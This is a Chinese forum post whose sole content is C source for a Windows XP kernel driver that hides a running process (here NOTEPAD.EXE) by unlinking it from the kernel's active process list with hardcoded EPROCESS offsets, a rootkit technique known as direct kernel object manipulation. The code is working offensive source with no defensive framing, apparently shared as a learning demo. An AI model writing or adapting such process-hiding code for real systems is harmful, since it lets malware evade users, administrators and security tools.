本帖最后由 古月不傲 于 2020-6-13 12:47 编辑
[C] 纯文本查看 复制代码 #include <ntddk.h>
enum XP_SYSTEM
{
g_uNextProcess = 0x88,
g_uPrevProcess = 0x8c,
g_uImageFileName = 0x174
};
PLIST_ENTRY g_pListEntryTemp = NULL;
PLIST_ENTRY g_pHeadEntry = NULL;
VOID MyDriverUnload(PDRIVER_OBJECT pDriverObject)
{
if (g_pListEntryTemp != NULL)
{
InsertHeadList(g_pHeadEntry, g_pListEntryTemp);
}
}
VOID HideProcessor()
{
PEPROCESS pCurrrentProcess = NULL;
PEPROCESS pPreviousProcess = NULL;
pCurrrentProcess = PsGetCurrentProcess();
pPreviousProcess = (PEPROCESS)(*((PULONG_PTR)((ULONG_PTR)pCurrrentProcess + g_uPrevProcess)) - g_uNextProcess);
while (pCurrrentProcess != pPreviousProcess)
{
if (strcmp(((PCHAR)((ULONG_PTR)pCurrrentProcess + g_uImageFileName)), "NOTEPAD.EXE") == 0)
{
KdPrint(("..."));
g_pListEntryTemp = (PLIST_ENTRY)(((ULONG_PTR)pCurrrentProcess + g_uNextProcess));
RemoveEntryList(g_pListEntryTemp);
break;
}
KdPrint(("---"));
pCurrrentProcess = (PEPROCESS)(*((PULONG_PTR)((ULONG_PTR)pCurrrentProcess + g_uNextProcess)) - g_uNextProcess);
}
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pStrRegPath)
{
g_pHeadEntry = (PLIST_ENTRY)((ULONG_PTR)PsGetCurrentProcess() + g_uNextProcess);
pDriverObject->DriverUnload = MyDriverUnload;
__try
{
HideProcessor();
}
__except (EXCEPTION_EXECUTE_HANDLER)
{
KdPrint(("异常..."));
}
return STATUS_SUCCESS;
}
| 
发表于 2019-11-28 03:27
|
发表于 2019-11-28 06:58
